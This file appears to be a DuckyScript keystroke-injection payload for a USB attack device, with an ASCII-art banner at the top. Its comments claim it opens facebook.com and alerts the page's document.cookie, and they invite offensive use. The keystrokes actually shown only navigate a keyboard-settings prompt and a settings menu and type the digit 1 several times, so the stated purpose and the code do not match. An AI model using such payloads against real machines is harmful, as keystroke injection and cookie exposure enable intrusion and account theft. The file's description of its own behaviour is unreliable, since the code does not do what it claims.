REM                                                                    _..._       .-'''-.                 .-'''-.
REM                                                                 .-'_..._''.   '   _    \  .---.       '   _    \
REM /|                                                            .' .'      '.\/   /` '.   \ |   |.--. /   /` '.   \
REM ||    .-.          .-                                        / .'          .   |     \  ' |   ||__|.   |     \  '
REM ||     \ \        / /                               .-,.--. . '            |   '      |  '|   |.--.|   '      |  '
REM ||  __  \ \      / /                          __    |  .-. || |            \    \     / / |   ||  |\    \     / /
REM ||/'__ '.\ \    / /            .--------.  .:--.'.  | |  | || |             `.   ` ..' /  |   ||  | `.   ` ..' /
REM |:/`  '. '\ \  / /             |____    | / |   \ | | |  | |. '                '-...-'`   |   ||  |    '-...-'`
REM ||     | | \ `  /                  /   /  `" __ | | | |  '-  \ '.          .              |   ||  |
REM ||\    / '  \  /                 .'   /    .'.''| | | |       '. `._____.-'/              |   ||__|
REM |/\'..' /   / /                 /    /___ / /   | |_| |         `-.______ /               '---'
REM '  `'-'`|`-' /                 |         |\ \._,\ '/|_|                  `
REM          '..'                  |_________| `--'  `"
REM Opens facebook.com within the default browser and alerts the document.cookie for Facebook.
REM Use your imagination for offensive purposes.

DELAY 1000

REM Change keyboard settings? Go to No:
RIGHTARROW
DELAY 1000

ENTER
DELAY 1000

REM Open settings menu:
GUI
DELAY 1000

DOWNARROW
DELAY 1000

DOWNARROW
DELAY 1000

DOWNARROW
DELAY 1000

ENTER
DELAY 1000

ENTER
DELAY 1000

LEFTARROW
DELAY 1000

LEFTARROW
DELAY 1000

ENTER
DELAY 1000

DOWNARROW
DELAY 1000

ENTER
DELAY 1000

DOWNARROW
DELAY 1000

ENTER
DELAY 1000

DOWNARROW
DELAY 1000

ENTER
DELAY 1000

STRING 1
DELAY 1000

RIGHTARROW
DELAY 1000

STRING 1
DELAY 1000

RIGHTARROW
DELAY 1000

STRING 1
DELAY 1000

RIGHTARROW
DELAY 1000

STRING 1
DELAY 1000

RIGHTARROW
DELAY 1000

ENTER
DELAY 1000

DOWNARROW
DELAY 1000

ENTER
DELAY 1000

ENTER
DELAY 1000

ESCAPE
DELAY 1000

ESCAPE
